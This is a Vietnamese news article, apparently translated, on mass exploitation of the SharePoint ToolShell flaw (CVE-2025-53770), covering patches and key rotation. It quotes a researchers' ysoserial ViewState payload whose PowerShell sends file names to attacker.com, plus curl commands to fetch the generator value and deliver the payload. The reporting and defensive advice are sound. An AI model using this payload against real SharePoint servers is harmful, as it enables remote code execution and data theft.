Lỗ hổng bảo mật SharePoint với mức độ nghiêm trọng 9.8 đang bị khai thác trên toàn cầu.

Tác giả tanthanh 10/02/2026 13 phút đọc

Các nhà chức trách và nhà nghiên cứu đang gióng lên hồi chuông cảnh báo về việc khai thác hàng loạt một lỗ hổng có mức độ nghiêm trọng cao trong Microsoft SharePoint Server mà Lừa cho phép kẻ tấn công lấy đi dữ liệu nhạy cảm của công ty, bao gồm cả mã thông báo xác thực được sử dụng để truy cập các hệ thống bên trong mạng. Các nhà nghiên cứu cho biết bất kỳ ai chạy phiên bản SharePoint tại chỗ nên cho rằng mạng của họ bị vi phạm.

Lỗ hổng này, được theo dõi là CVE-2025-53770, có mức độ nghiêm trọng là 9,8/10. Nó cung cấp quyền truy nhập từ xa không được xác thực vào Máy chủ SharePoint được hiển thị trên Internet. Bắt đầu từ thứ Sáu, các nhà nghiên cứu bắt đầu cảnh báo về việc khai thác tích cực lỗ hổng, ảnh hưởng đến Máy chủ SharePoint mà khách hàng cơ sở hạ tầng chạy nội bộ. SharePoint Online được lưu trữ trên đám mây của Microsoft và Microsoft 365 không bị ảnh hưởng.

Không phải webshell điển hình của bạn

Microsoft xác nhận các cuộc tấn công vào việc khai thác ngày 0 vào thứ Bảy. Một ngày sau, công ty đã cập nhật bài đăng để cung cấp bản cập nhật khẩn cấp vá lỗ hổng và bản cập nhật liên quan được theo dõi là CVE-2025-53771, trong Phiên bản đăng ký SharePoint và SharePoint 2019. Khách hàng sử dụng một trong hai phiên bản nên áp dụng các bản cập nhật ngay lập tức. SharePoint 2016 vẫn chưa được vá tại thời điểm bài đăng Ars này đi vào hoạt động. Microsoft nói rằng các tổ chức sử dụng phiên bản này nên cài đặt các Giao diện quét phần mềm chống phần mềm độc hại.

Chuỗi khai thác được quan sát có liên quan chặt chẽ với các chuỗi được chứng minh vào tháng 5 tại cuộc thi hack Pwn2Own ở Berlin cho hai lỗ hổng riêng biệt. Các lỗ hổng bị khai thác, được theo dõi là CVE-2025-49704 và CVE-2025-49706, đã được vá một phần hai tuần trước trong bản phát hành cập nhật hàng tháng của Microsoft. Các bản vá cuối tuần này dành cho CVE-2025-53770 và CVE-2025-53771 bao gồm “các biện pháp bảo vệ mạnh mẽ hơn ” tương ứng cho CVE-2025-49704 và CVE-2025-49706 của Microsoft nói rằng".

Việc cài đặt các bản cập nhật chỉ là bước khởi đầu của quá trình khôi phục, vì việc lây nhiễm cho phép kẻ tấn công thực hiện bằng thông tin xác thực cho phép truy cập rộng rãi vào nhiều tài nguyên nhạy cảm bên trong mạng bị xâm phạm. Thông tin thêm về các bước bổ sung sau trong bài viết này.

Vào thứ Bảy, các nhà nghiên cứu từ công ty bảo mật Eye Security báo cáo phát hiện “hàng chục hệ thống bị xâm phạm tích cực trong hai đợt tấn công, vào ngày 18 tháng 7 khoảng 18:00 UTC và ngày 19 tháng 7 khoảng 07:30 UTC.” Các hệ thống nằm rải rác trên toàn cầu đã bị tấn công bằng cách sử dụng lỗ hổng bị khai thác và sau đó bị nhiễm một cửa hậu dựa trên webshell có tên ToolShell. Các nhà nghiên cứu của Eye Security cho biết cửa sau có thể truy cập vào các phần nhạy cảm nhất của Máy chủ SharePoint và từ đó trích xuất các mã thông báo cho phép chúng thực thi mã cho phép kẻ tấn công mở rộng phạm vi tiếp cận của chúng bên trong mạng.

“Đây không phải là vỏ web điển hình của bạn, các nhà nghiên cứu của Eye Security đã viết. “Không có lệnh tương tác, shell đảo ngược hoặc logic lệnh và điều khiển. Thay vào đó, trang được gọi nội bộ.NET để đọc cấu hình MachineKey của máy chủ SharePoint, bao gồm ValidationKey. Các khóa này rất cần thiết để tạo tải trọng __VIEWSTATE hợp lệ và việc có được quyền truy cập vào chúng sẽ biến bất kỳ yêu cầu SharePoint được xác thực nào thành cơ hội thực thi mã từ xa một cách hiệu quả.”

Việc thực thi mã từ xa được thực hiện bằng cách sử dụng khai thác để nhắm mục tiêu cách SharePoint dịch cấu trúc dữ liệu và trạng thái đối tượng thành các định dạng có thể được lưu trữ hoặc truyền đi và sau đó được xây dựng lại sau đó, một quá trình được gọi là tuần tự hóa. MỘT Lỗ hổng SharePoint Microsoft đã sửa lỗi vào năm 2021 đã có thể lạm dụng logic phân tích cú pháp để đưa các đối tượng vào các trang. Điều này xảy ra vì SharePoint đã chạy các đối tượng ASP.NET ViewState bằng cách sử dụng khóa ký ValidationKey, được lưu trữ trong cấu hình của máy. Điều này có thể cho phép kẻ tấn công khiến SharePoint giải tuần tự hóa các đối tượng tùy ý và thực thi các lệnh nhúng. Tuy nhiên, những khai thác đó bị hạn chế bởi yêu cầu tạo chữ ký hợp lệ, do đó yêu cầu quyền truy cập vào Khóa xác thực bí mật của máy chủ.

Các nhà nghiên cứu đã viết:

Giờ đây, với chuỗi ToolShell (CVE-2025-49706 + CVE-2025-49704), những kẻ tấn công dường như đã trích xuất được
ValidationKey trực tiếp từ bộ nhớ hoặc cấu hình. Sau khi tài liệu mật mã này bị rò rỉ, kẻ tấn công có thể tạo ra tài liệu hoàn toàn hợp lệ, có chữ ký __VIEWSTATE tải trọng bằng cách sử dụng một công cụ được gọi là ysoserial như trong ví dụ dưới đây.
Sử dụng ysoserial kẻ tấn công có th tạo ra nó có mã thông báo SharePoint hợp lệ riêng cho RCE.
# command to get the  via any public available SharePoint page, like start.aspx
curl -s https://target.com/_layouts/15/start.aspx | grep -oP '__VIEWSTATEGENERATOR" value="\K[^"]+'
# example malicious Powershell viewstate payload that the adversary can utilize as RCE to list a dir
ysoserial.exe -p ViewState -g TypeConfuseDelegate \
-c "powershell -nop -c \"dir 'C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\TEMPLATE\LAYOUTS' | % { Invoke-WebRequest -Uri ('http://attacker.com/?f=' + [uri]::EscapeDataString($_.Name)) }\"" \
--generator="" \
--validationkey="" \
--validationalg="" \
--islegacy \
--minify
# finally, by adding the generated token to any request, the command is executed (RCE)
curl http://target/_layouts/15/success.aspx?__VIEWSTATE=
Các tải trọng này có thể nhúng bất kỳ lệnh độc hại nào và được máy chủ chấp nhận làm đầu vào đáng tin cậy, hoàn thành chuỗi RCE mà không yêu cầu thông tin xác thực. Điều này phản ánh điểm yếu về thiết kế được khai thác vào năm 2021, nhưng hiện được đóng gói thành chuỗi zero-day hiện đại với tính năng thả vỏ tự động, tính bền bỉ hoàn toàn và xác thực bằng 0.

Vá chỉ là khởi đầu

Những kẻ tấn công đang sử dụng khả năng đánh cắp khóa máy SharePoint ASP.NET, cho phép kẻ tấn công thực hiện các vụ hack cơ sở hạ tầng bổ sung sau này. Điều đó có nghĩa là việc vá lỗi một mình không đảm bảo rằng những kẻ tấn công đã bị đuổi ra khỏi một hệ thống bị xâm nhập. Thay vào đó, các tổ chức bị ảnh hưởng phải xoay các phím máy SharePoint ASP.NET và khởi động lại máy chủ web IIS đang chạy trên đầu trang.

Theo như Washington Post, ít nhất hai cơ quan liên bang đã phát hiện ra rằng các máy chủ bên trong mạng của họ đã bị xâm phạm trong các cuộc tấn công đang diễn ra.

Bài đăng Eye Security cung cấp các chỉ báo kỹ thuật mà quản trị viên có thể sử dụng để xác định xem hệ thống của họ có bị nhắm mục tiêu trong các cuộc tấn công hay không. Nó cũng cung cấp nhiều biện pháp khác nhau mà các tổ chức dễ bị tổn thương có thể thực hiện để củng cố hệ thống của họ chống lại hoạt động này.

Trong một post vào chủ nhật, Cơ quan An ninh Cơ sở hạ tầng và An ninh mạng Hoa Kỳ đã xác nhận các cuộc tấn công và việc sử dụng ToolShell của chúng. Bài đăng tiếp tục cung cấp danh sách các biện pháp bảo mật của riêng mình.

Tác giả tanthanh Admin

Theo dõi:

Bài viết trước

Những điều cần biết về ToolShell, mối đe dọa SharePoint đang bị khai thác hàng loạt.

Viết bình luận

Thêm bình luận

Lỗ hổng bảo mật SharePoint với mức độ nghiêm trọng 9.8 đang bị khai thác trên toàn cầu.

Không phải webshell điển hình của bạn

Vá chỉ là khởi đầu

Những điều cần biết về ToolShell, mối đe dọa SharePoint đang bị khai thác hàng loạt.

Bài viết liên quan

Những điều cần biết về ToolShell, mối đe dọa SharePoint đang bị khai thác hàng loạt.

Các cuộc tấn công chuỗi cung ứng vào phần mềm mã nguồn mở đang trở nên mất kiểm soát.

Lỗ hổng trong công cụ lập trình Gemini CLI có thể cho phép tin tặc thực thi các lệnh độc hại.